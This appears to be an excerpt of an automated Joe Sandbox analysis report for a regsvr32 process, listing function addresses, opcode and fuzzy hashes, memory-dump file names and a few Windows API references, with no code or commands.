Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: 0123456789abcdef
API String ID: 0-1757737011
Opcode ID: ee398ae0af3f1eb467bff0aa26ff793cc6fd9e0476b6e486af866dd9f14fb90b
Instruction ID: 12009a62c754b8f96378ede8ead925e77006e52a0c66fa8bad44cd3623b7feef
Opcode Fuzzy Hash: ee398ae0af3f1eb467bff0aa26ff793cc6fd9e0476b6e486af866dd9f14fb90b
Instruction Fuzzy Hash: E7613592E0EED069E3188E6884502BE3AF1E715784F04993DEE6F57795CA3CD505E310

Function 00007FF8A930C1D0 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

0123456789abcdef, xrefs: 00007FF8A930C250, 00007FF8A930C367

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: 0123456789abcdef
API String ID: 0-1757737011
Opcode ID: 738b7bcf3c5c96e1df0669978c6a6781dd5dd2607d69cdac85a126c222d5d7e1
Instruction ID: 51503822d15235f1971f0853cc2f5a77716acb3600ef5f40100915774574dceb
Opcode Fuzzy Hash: 738b7bcf3c5c96e1df0669978c6a6781dd5dd2607d69cdac85a126c222d5d7e1
Instruction Fuzzy Hash: 8B515913B2EEE09AE3118B7884006AC3F72DBD6748F08D0E5CB895BB9AC97DC105D711

Function 00007FF8A93522C0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

Invalid checksum, xrefs: 00007FF8A9352346

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: Invalid checksum
API String ID: 0-2521479841
Opcode ID: 9d68a5b01d58a1c74c7cb6f6e398fce270ee32bb74a30515b8744937828c481c
Instruction ID: 96cc2c0303d43e263b17a18dedc4fc1b012cecbf9ea3e331521a252ac45fd385
Opcode Fuzzy Hash: 9d68a5b01d58a1c74c7cb6f6e398fce270ee32bb74a30515b8744937828c481c
Instruction Fuzzy Hash: EB41F372A1EAC2AAEB648F10A8407B97771EB587D0F94E031DB8DC3651DF2CE5858300

Function 026F2ED4 Relevance: .7, Instructions: 730COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26e0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f830e609fe5cee47e6c16999e452ce305c1c12be961c10b305ce6362bf0b176d
Instruction ID: 332143e9f0274de802009ba5887aed68987e9fdf1cdeb20fb8ddce8132df33c0
Opcode Fuzzy Hash: f830e609fe5cee47e6c16999e452ce305c1c12be961c10b305ce6362bf0b176d
Instruction Fuzzy Hash: 4F428871608381AFDBA4CF28C884B6BBBE9BF88714F14496DFA859B341D730E855CB51

Function 00007FF8A935E0A0 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cbbf61adc9766ab06f620da19617610e020b7619ca8c4534f07695108860661
Instruction ID: 4a66d035b170c0f255b0f8285893c32df082ca2f15def45c0600a078a3398ee8
Opcode Fuzzy Hash: 2cbbf61adc9766ab06f620da19617610e020b7619ca8c4534f07695108860661
Instruction Fuzzy Hash: 3D627DB391D6819BE3648F25C14036EBBB0F785B98F259239CB4987B48CB79E851DF40

Function 00007FF8A93383D0 Relevance: .6, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b83806e05523c94b193beb7f49ba70408051c34eda2f1dd708b59c489c014d
Instruction ID: 2a3e23191e7791acfd8792ed6e36b2ca7cca001fabcdcca7338cfad5b22cf8c8
Opcode Fuzzy Hash: 09b83806e05523c94b193beb7f49ba70408051c34eda2f1dd708b59c489c014d
Instruction Fuzzy Hash: 0442787AB19B919AEB14CFA8E4402AE37B0F744788F10592EDE5E9BB94CFB4D145C340

Function 026EE540 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26e0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
Instruction ID: 20de6ff96d85481c15956ab4ffac6cdd0c32667aa35a0039988cc82b5f6a6be6
Opcode Fuzzy Hash: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
Instruction Fuzzy Hash: 29D19430719B498BDF68DF6898897AEB7E5FB58715F00422EE85BC7240DF30E5128B81

Function 00007FF8A93624C0 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b379eb95eddf4a739ffdec58de01ed55cc592d459a0fb3cf5a239a4da12b32
Instruction ID: 811836921858ec7777b50239a237c98f0616f68985397eae4347ce7e55205c1e
Opcode Fuzzy Hash: 19b379eb95eddf4a739ffdec58de01ed55cc592d459a0fb3cf5a239a4da12b32
Instruction Fuzzy Hash: 2BF1E572A1DB8186D721CE14A44076AF7A1FB957C9F159335DF8DA3B44DB3DE8418B00

Function 00007FF8A9321330 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f621c93dee6c75bf794f4e9bf10a488de4abb7c11026712c06788c533fcff2d
Instruction ID: 15b61625f987e72fe949dd76274465c6c5181ba1a435d926a8e5803fd6b2343d
Opcode Fuzzy Hash: 8f621c93dee6c75bf794f4e9bf10a488de4abb7c11026712c06788c533fcff2d
Instruction Fuzzy Hash: B4C15C92D0EED664F7718EE4968077A6AB2D7327E1F54B230CB6E932D1CE7C99458300

Function 00007FF8A9363A70 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d7fda05aa5002f310405410d87200e77d0c13500d4daf0d15252da8c444966
Instruction ID: 7e5f7386a9a6123894c54db403591910cfaa517aa4bfd9aefa566433b1ea3af5
Opcode Fuzzy Hash: 62d7fda05aa5002f310405410d87200e77d0c13500d4daf0d15252da8c444966
Instruction Fuzzy Hash: 7AE17E77A1DAC59AE7648F29C04476EBBB1FB84B88F149175DB0987798CF38E845CB00

Function 00007FF8A9311B72 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cabdd7db65639e64826cc91f615f0f1705bee77b54f99ab1b21d4b7534ab303
Instruction ID: 8301d8068def6f3ab990fb76bae5e7692b1c24599485c184a8a6b5b1d3a76bb1
Opcode Fuzzy Hash: 5cabdd7db65639e64826cc91f615f0f1705bee77b54f99ab1b21d4b7534ab303
Instruction Fuzzy Hash: C6E17A66E29FC556F323573864032B5E718AFFB2C9E40E31AFDD4B0D23EB6482529644

Function 00007FF8A9321CA0 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 067649223c953f9525c2a410a9a8de33b233618c428a583215ad72e4834a7444
Instruction ID: e3fa09825d4f0f432bcf232276e140e53e154d5d0e32bf419efb56302668f0fc
Opcode Fuzzy Hash: 067649223c953f9525c2a410a9a8de33b233618c428a583215ad72e4834a7444
Instruction Fuzzy Hash: A5B14B26A0EFD5A4FB648F6096403FD67B2EF217C8F44A131DE4D82595DE3CA186C300

Function 026F06DC Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26e0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
Instruction ID: 4cf45a9586cc7aa7ba65fa6e54288608c808653a48ea8ecf5cc089ffd1b31597
Opcode Fuzzy Hash: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
Instruction Fuzzy Hash: 17A13031608A4C8FDB55EF28C889BEA77F5FB68315F10466EE84AC7165EB30D644CB81

Function 00007FF8A9309EF0 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86622737fe52af6c211b92eb3b40a167755c2b2f86006756955474b673b19b9e
Instruction ID: b68b45cbc0d8e393f89cd443a978e8aae0aa1f06cc5841ad2dc0320fb811a687
Opcode Fuzzy Hash: 86622737fe52af6c211b92eb3b40a167755c2b2f86006756955474b673b19b9e
Instruction Fuzzy Hash: FE918892E2EFE612E623477939016A596109F537E4E44E332FD7DB1BE4DB2DA6438200

Function 00007FF8A93350A0 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 062a11befc27f384af5af2a6cac435f1dc16abea98564fc87c628cacea8b601f
Instruction ID: bdd9fe67257967c79757946e64ca1059e64cc09afeba700e3ef3d2afa53ebef2
Opcode Fuzzy Hash: 062a11befc27f384af5af2a6cac435f1dc16abea98564fc87c628cacea8b601f
Instruction Fuzzy Hash: 1DA13466B1EBD191E7208F2589047AEBEB0F700BD9F216125CE5D23780DBB9C952C300

Function 00007FF8A936E2B0 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c79be9426116689442e0620c5e171a21f1165538b67e0dc750b65a7c7a05056
Instruction ID: d7addecca2d5a2bd3d4f94386efdd0256cb4718035b58b70ddc6d09918282ddd
Opcode Fuzzy Hash: 3c79be9426116689442e0620c5e171a21f1165538b67e0dc750b65a7c7a05056
Instruction Fuzzy Hash: 1991D533619AD182D7618F2999002AAB7A1FB897E4F14A331EF9C47BD8DB3CD155C700

Function 00007FF8A931C0C0 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4330e56959ee462ed1205fda9ac7683176cd5f26063ffa8ef68a2c8a5f0f074
Instruction ID: d88e15fcd76a24c1b6f90b77ed0c3ee5c3a9da69b404487fe1aa803d50ef2f5b
Opcode Fuzzy Hash: b4330e56959ee462ed1205fda9ac7683176cd5f26063ffa8ef68a2c8a5f0f074
Instruction Fuzzy Hash: 84412772F49AA552FF58CF91E564A787721E390FD0F11A032CD1AA3B94DE38D996C380

Function 00007FF8A9355404 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f2252cabe335833bc4814939a045e21dcde5a3641b26c1206611196aeeab64
Instruction ID: a71ec448c601bf4f953dd63b4d84dd4571f17a09791c8f3340ac6f783db1d9c7
Opcode Fuzzy Hash: 90f2252cabe335833bc4814939a045e21dcde5a3641b26c1206611196aeeab64
Instruction Fuzzy Hash: A2314D27B0F6C15FE6218E14B84067A7270EB897E4F942132DE4D83B91DE3DF8819700

Function 00007FF8A931BF50 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5516306428a42fe254c93f58bbeef348cd662d36b8fdb16bde27e9aed139195d
Instruction ID: be0aed9a43fe67a2bdb263056340d199d1dafd3ccc5023dc4d933ed173b61b71
Opcode Fuzzy Hash: 5516306428a42fe254c93f58bbeef348cd662d36b8fdb16bde27e9aed139195d
Instruction Fuzzy Hash: 8A31A9D6B08FC042FE54E7A8746737B9321A7857D0F40F236DE899660ADF2ED1428644

Function 00007FF8A933BC20 Relevance: 21.5, APIs: 10, Strings: 2, Instructions: 492memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A933B0D0: HeapFree.KERNEL32 ref: 00007FF8A933B1F8

SetLastError.KERNEL32 ref: 00007FF8A933BD4A
GetEnvironmentVariableW.KERNEL32 ref: 00007FF8A933BD5C
GetLastError.KERNEL32 ref: 00007FF8A933BD68
GetLastError.KERNEL32 ref: 00007FF8A933BD81
HeapFree.KERNEL32 ref: 00007FF8A933BE12
HeapFree.KERNEL32 ref: 00007FF8A933BEAB

Strings

at :, xrefs: 00007FF8A933BFCC
<unknown>, xrefs: 00007FF8A933C240

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
